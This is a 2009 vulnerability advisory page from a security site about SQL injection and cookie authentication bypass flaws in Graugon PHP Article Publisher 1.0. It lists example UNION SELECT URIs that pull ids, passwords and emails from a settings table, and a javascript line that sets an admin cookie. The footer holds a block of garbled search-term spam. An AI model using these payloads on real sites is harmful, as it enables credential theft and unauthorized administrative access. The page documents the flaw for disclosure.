about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Graugon PHP Article Publisher SQL Injection and Cookie Authentication Bypass Vulnerabilities


Title Graugon PHP Article Publisher SQL Injection and Cookie Authentication Bypass Vulnerabilities
Published 2009-03-02-12:00AM
Updated 2009-03-04-06:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  x0r
Vulnerable  Graugon PHP Article Publisher 1.0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available: http://www.example.com/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://www.example.com/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settingsThe following data is also available:javascript:document.cookie ="g_admin=1; path=/"
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 02:22:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www trisha shop.paipa Webmin htt Trisha sex Bigbook.89 200+%252Fc 2...2Fbrim 200+%252Fc 200+%252Fc worldwoman www.ku117. 200+%252Fc Www.eliphe khabmaroc ventrilo 4 200+%252Fc 200+%252Fc php-nuke 2 modifyform 200+%252Fc 2...2Fbrim vieri liuz.net.c 200+%252Fc 2...2Fbrim khabmaroc 200+%252Fc www.zgbskj sapgui p-book Actinic book www 89com softnews t248t jrockit artis+indi Isna wet pussy 2...2Fbrim 200+%252Fc 200+%252Fc Tagger LE urdo news 2...2Fbrim 200+%252Fc 200+%252Fc www.bodr.n www.tunisi Linux Buff